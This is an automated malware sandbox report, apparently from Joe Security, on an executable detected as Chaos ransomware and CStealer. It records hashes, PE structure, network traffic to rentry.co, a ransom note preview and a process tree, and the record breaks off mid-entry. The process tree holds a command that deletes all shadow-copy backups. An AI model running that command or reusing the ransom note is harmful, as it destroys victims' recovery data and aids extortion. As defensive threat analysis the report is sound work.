                                                          Size (bytes):1472
                                                          Entropy (8bit):7.768894215410588
                                                          Encrypted:false
                                                          SSDEEP:24:2irDrf6u4FRxhngQ2tX28ptr95D8/cgwJVBQmo3k8kikgM8/OWShwQm/zIsG:2I/f69xhgQ2F94MTjEDkCM8/OWTQ0EP
                                                          MD5:4161E5A754536147108741BE43CCEF69
                                                          SHA1:19245672BF580094FCA74FFC0A144F566ED78DE2
                                                          SHA-256:7B05FF31C76FEC2FB2D77B88917C25A27DB816B028CC73D7955A5CE963C1FDE2
                                                          SHA-512:6FC198D51CDAA9324157FDCAE293B01DA6815F67980ABBD0140CBEE0A7F7A14860FBD6A4C914A32FC3F67ECBA288ADEA106D0905724BC11E0351827B436A0CFC
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1472
                                                          Entropy (8bit):7.7811425930211096
                                                          Encrypted:false
                                                          SSDEEP:24:Dkx4cOoOGQRl2aPV8PSFAZlZIBKPcyMxrUwE4Lj7N4l12NKPv06n0uVPt/+t34OP:DDoO3zR8aFAZl1gxrUwE4/xc12NS0m0J
                                                          MD5:8E779279366F2E4F2BAFE988B54D34B5
                                                          SHA1:E9AEA3ABCC40427A67D49A458A61767FDBFEBF36
                                                          SHA-256:1BF845F0A839C94DD6C604A5A4BC3057AC522D7EC0665A065F85C2EB59D4237E
                                                          SHA-512:716217DAEA2FDCA589C0CA0DD798C321B51A2924F49E500537F8923B200589D135DDD70D848DE9F58ED4BA19659C635D7A15D589DEA179EFE95302A68DDFEC15
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Windows\System32\wbadmin.exe
                                                          File Type:dBase III DBT, version number 0, next free block index 10240, 1st item " @2_"
                                                          Category:dropped
                                                          Size (bytes):30720
                                                          Entropy (8bit):1.9139032443475696
                                                          Encrypted:false
                                                          SSDEEP:96:B/MZNGb/rZ6Oh5qh212AmSNUBblqUB26klXFp:kopuh2sAvNUBblqUB26klXFp
                                                          MD5:E2ED346EC941D3A3642ADEF82020FE74
                                                          SHA1:49E9138E4E72B3499B12F216E0288405C23135F2
                                                          SHA-256:82CBAE745CFE62F8A447BB3783AD3DB16D473AA3CD76D672D916F15964576E1C
                                                          SHA-512:31931BD3D2EBC0FDCF22CC976A997B4EE4D3003CB361BBA5C90BD00B2463275DCB313C183C082D5A707FB31FE29C1F3E5EBE6A0B10AD304208F46839685B1CD6
                                                          Malicious:false
                                                          Preview:.(..@...@...........................................!............................... ... @2_.............(......eJ......._x.....Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1.............................................................D.f.............M.............W.B.E.n.g.i.n.e...C.:.\.W.i.n.d.o.w.s.\.L.o.g.s.\.W.i.n.d.o.w.s.B.a.c.k.u.p.\.W.B.E.n.g.i.n.e...0...e.t.l...........P.P..... ... @2_................................................................8.B. @2_....19041.1.amd64fre.vb_release.191206-1406.....-.@. @2_....I:...S%9.`...'.R....uudf.pdb........0.@. @2_......B..,`..9..4.....ifsutil.pdb.....1.@. @2_...........1$OI"......wbengine.pdb............,.@. @2_...............'"a.-....spp.pdb...........@. @2_.....T.c..i.\.C.s"8@....vssvc.pdb......./.@. @2_....W.p.D.......]....vssapi.pdb......-.@. @2_.....\..Q....T*&.......udfs.pdb........0.@. @2_.....2.R.+..
                                                          Process:C:\Windows\System32\svchost.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):55
                                                          Entropy (8bit):4.306461250274409
                                                          Encrypted:false
                                                          SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                          MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                          SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                          SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                          SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                          Malicious:false
                                                          Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                          Process:C:\Windows\System32\wbem\WMIC.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:dropped
                                                          Size (bytes):48
                                                          Entropy (8bit):4.305255793112395
                                                          Encrypted:false
                                                          SSDEEP:3:8yzGc7C1RREal:nzGtRV
                                                          MD5:6ED2062D4FB53D847335AE403B23BE62
                                                          SHA1:C3030ED2C3090594869691199F46BE7A9A12E035
                                                          SHA-256:43B5390113DCBFA597C4AAA154347D72F660DB5F2A0398EB3C1D35793E8220B9
                                                          SHA-512:C9C302215394FEC0B38129280A8303E0AF46BA71B75672665D89828C6F68A54E18430F953CE36B74F50DC0F658CA26AC3572EA60F9E6714AFFC9FB623E3C54FC
                                                          Malicious:false
                                                          Preview:ERROR:...Description = Initialization failure...
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.9986130392653
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:4wx72yFLka.exe
                                                          File size:18'377'488 bytes
                                                          MD5:fe194bd31f2388a09bbef24ddaa212ce
                                                          SHA1:cb01c1cb0a2fc192c28b3d7864e739d9d8575e08
                                                          SHA256:7737fb5fa7440206dbbd7dbeb8222a2851caf6210005e37d6d5d765081940e9a
                                                          SHA512:c682844cbe5899465e6ba14304a7d6cdfabb41c2f31c94e0407af953cf9889ed70da6a27615d868e2e9fa7f3711db488741c3cd68789a5ed7ac4fb1a60478054
                                                          SSDEEP:393216:2VVC+w99uPfkiyV4wqWisNWhQkUS9O6OKpsSH+sWTF:2m/fiyyFWFN7kJOKpsk+sWJ
                                                          TLSH:DA07331AB2F0DC75D07214731026FB0C592A7C984B7A44CA779C8C3EEED66608B3769B
                                                          File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$............s...s...s....V..s....T.&s....U..s..(.Z..s..(....s..(....s..(....s....$..s....4..s...s...r..&....s..&....s..&.X..s..&....s.
                                                          Icon Hash:0f73e9ccec717117
                                                          Entrypoint:0x4205e0
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x63EE221D [Thu Feb 16 12:31:25 2023 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:aac51396886833dc961fcd7aab7711e4
                                                          Instruction
                                                          call 00007FE608FD3A3Bh
                                                          jmp 00007FE608FD33EDh
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push 004238E0h
                                                          push dword ptr fs:[00000000h]
                                                          mov eax, dword ptr [esp+10h]
                                                          mov dword ptr [esp+10h], ebp
                                                          lea ebp, dword ptr [esp+10h]
                                                          sub esp, eax
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          mov eax, dword ptr [004407A8h]
                                                          xor dword ptr [ebp-04h], eax
                                                          xor eax, ebp
                                                          push eax
                                                          mov dword ptr [ebp-18h], esp
                                                          push dword ptr [ebp-08h]
                                                          mov eax, dword ptr [ebp-04h]
                                                          mov dword ptr [ebp-04h], FFFFFFFEh
                                                          mov dword ptr [ebp-08h], eax
                                                          lea eax, dword ptr [ebp-10h]
                                                          mov dword ptr fs:[00000000h], eax
                                                          ret
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          mov ecx, dword ptr [ebp-10h]
                                                          mov dword ptr fs:[00000000h], ecx
                                                          pop ecx
                                                          pop edi
                                                          pop edi
                                                          pop esi
                                                          pop ebx
                                                          mov esp, ebp
                                                          pop ebp
                                                          push ecx
                                                          ret
                                                          push ebp
                                                          mov ebp, esp
                                                          sub esp, 0Ch
                                                          lea ecx, dword ptr [ebp-0Ch]
                                                          call 00007FE608FC6401h
                                                          push 0043D14Ch
                                                          lea eax, dword ptr [ebp-0Ch]
                                                          push eax
                                                          call 00007FE608FD6095h
                                                          int3
                                                          jmp 00007FE608FD7F68h
                                                          push ebp
                                                          mov ebp, esp
                                                          and dword ptr [00463D58h], 00000000h
                                                          sub esp, 24h
                                                          or dword ptr [004407A0h], 01h
                                                          push 0000000Ah
                                                          call dword ptr [004341C0h]
                                                          test eax, eax
                                                          je 00007FE608FD3722h
                                                          and dword ptr [ebp-10h], 00000000h
                                                          xor eax, eax
                                                          push ebx
                                                          push esi
                                                          push edi
                                                          xor ecx, ecx
                                                          lea edi, dword ptr [ebp-24h]
                                                          Programming Language:
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3e2e0 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3e314 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x79f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6e000 | 0x23ac | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3c1b0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x366a8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x34000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3d85c | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x32c1c | 0x32e00 | a1ba412b9e1884abc6d558ab47956164 | False | 0.5910002687346437 | data | 6.697107176948733 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x34000 | 0xb130 | 0xb200 | e8a43ec311a1dd8d79c08d2904e6baa9 | False | 0.4591818820224719 | data | 5.257834305517335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x40000 | 0x24750 | 0x1200 | 0328c3d939c05c71c4948de3b281e0a8 | False | 0.4058159722222222 | data | 4.083983051040627 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x65000 | 0x190 | 0x200 | a0c9db934b14102cc1f3554d5b03e4a9 | False | 0.44921875 | data | 3.372762520317566 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x66000 | 0x79f8 | 0x7a00 | fb6329ab7ec146626a768403b53fb539 | False | 0.772797131147541 | data | 7.18999435974827 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x6e000 | 0x23ac | 0x2400 | bca9bb68b94ec3a66ae1197cf37f5016 | False | 0.7834201388888888 | data | 6.644075573908012 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x66524 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x6706c | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x68618 | 0x3091 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 1.0003217244430145
RT_DIALOG | 0x6b6ac | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x6b934 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x6ba70 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x6bb5c | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6bc8c | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6bfc4 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x6c218 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x6c3fc | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x6c5c8 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x6c780 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x6c8c8 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x6cd34 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x6ce9c | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x6cff0 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x6d0fc | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x6d1b8 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6d290 | 0x14 | data | | | 1.05
RT_MANIFEST | 0x6d2a4 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333

DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapReAlloc, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Language of compilation system | Country where language is spoken | Map
English | United States |

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 4, 2024 14:26:38.454030991 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:38.454075098 CEST | 443 | 49705 | 104.26.3.16 | 192.168.2.8
Sep 4, 2024 14:26:38.454154968 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:39.830923080 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:39.830950975 CEST | 443 | 49705 | 104.26.3.16 | 192.168.2.8
Sep 4, 2024 14:26:40.509557962 CEST | 443 | 49705 | 104.26.3.16 | 192.168.2.8
Sep 4, 2024 14:26:40.713016033 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:40.722836018 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:40.722855091 CEST | 443 | 49705 | 104.26.3.16 | 192.168.2.8
Sep 4, 2024 14:26:40.724359989 CEST | 443 | 49705 | 104.26.3.16 | 192.168.2.8
Sep 4, 2024 14:26:40.724374056 CEST | 443 | 49705 | 104.26.3.16 | 192.168.2.8
Sep 4, 2024 14:26:40.724442959 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:40.725778103 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16
Sep 4, 2024 14:26:40.725888014 CEST | 49705 | 443 | 192.168.2.8 | 104.26.3.16

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 4, 2024 14:26:38.443161964 CEST | 64980 | 53 | 192.168.2.8 | 1.1.1.1
Sep 4, 2024 14:26:38.450166941 CEST | 53 | 64980 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 4, 2024 14:26:38.443161964 CEST | 192.168.2.8 | 1.1.1.1 | 0xfe35 | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 4, 2024 14:26:38.450166941 CEST | 1.1.1.1 | 192.168.2.8 | 0xfe35 | No error (0) | rentry.co | | 104.26.3.16 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 14:26:38.450166941 CEST | 1.1.1.1 | 192.168.2.8 | 0xfe35 | No error (0) | rentry.co | | 104.26.2.16 | A (IP address) | IN (0x0001) | false
Sep 4, 2024 14:26:38.450166941 CEST | 1.1.1.1 | 192.168.2.8 | 0xfe35 | No error (0) | rentry.co | | 172.67.75.40 | A (IP address) | IN (0x0001) | false


                                                          Target ID:0
                                                          Start time:08:26:25
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\4wx72yFLka.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\4wx72yFLka.exe"
                                                          Imagebase:0x40000
                                                          File size:18'377'488 bytes
                                                          MD5 hash:FE194BD31F2388A09BBEF24DDAA212CE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: 00000000.00000003.1451758273.0000000006A50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:08:26:28
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\Mai.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\Mai.exe"
                                                          Imagebase:0x7ff6dd650000
                                                          File size:17'965'330 bytes
                                                          MD5 hash:14F564392EEC0B9EDA9530411159057C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:3
                                                          Start time:08:26:28
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\main.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\main.exe"
                                                          Imagebase:0x130000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: 00000003.00000002.1536320956.00000000126E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: 00000003.00000000.1465048212.0000000000132000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:4
                                                          Start time:08:26:32
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\Desktop\Mai.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\Mai.exe"
                                                          Imagebase:0x7ff6dd650000
                                                          File size:17'965'330 bytes
                                                          MD5 hash:14F564392EEC0B9EDA9530411159057C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2316801150.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000002.2720092916.000001995EE60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000002.2718920949.000001995E6E4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_CStealer, Description: Yara detected CStealer, Source: 00000004.00000003.1554405640.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:5
                                                          Start time:08:26:32
                                                          Start date:04/09/2024
                                                          Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                          Imagebase:0x800000
                                                          File size:1'357'824 bytes
                                                          MD5 hash:840EB9E50C131322605C5EA90AE1312F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_Chaos_1, Description: Yara detected Chaos Ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                          • Rule: INDICATOR_SUSPICOUS_EXE_References_VEEAM, Description: Detects executables containing many references to VEEAM. Observed in ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: unknown
                                                          • Rule: MALWARE_Win_Chaos, Description: Detects Chaos ransomware, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                          Reputation:low
                                                          Has exited:false

                                                          Target ID:6
                                                          Start time:08:26:36
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\cmd.exe /c "ver"
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:08:26:36
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:8
                                                          Start time:08:26:37
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
                                                          Imagebase:0x7ff73d1d0000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:9
                                                          Start time:08:26:37
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6ee680000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:10
                                                          Start time:08:26:38
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\vssadmin.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:vssadmin delete shadows /all /quiet
                                                          Imagebase:0x7ff729250000
                                                          File size:145'920 bytes
                                                          MD5 hash:B58073DB8892B67A672906C9358020EC
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:12
                                                          Start time:08:26:38
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\svchost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\System32\svchost.exe -k swprv
                                                          Imagebase:0x7ff67e6d0000
                                                          File size:55'320 bytes
                                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:08:26:40
                                                          Start date:04/09/2024
                                                          Path:C:\Windows\System32\wbem\WMIC.exe
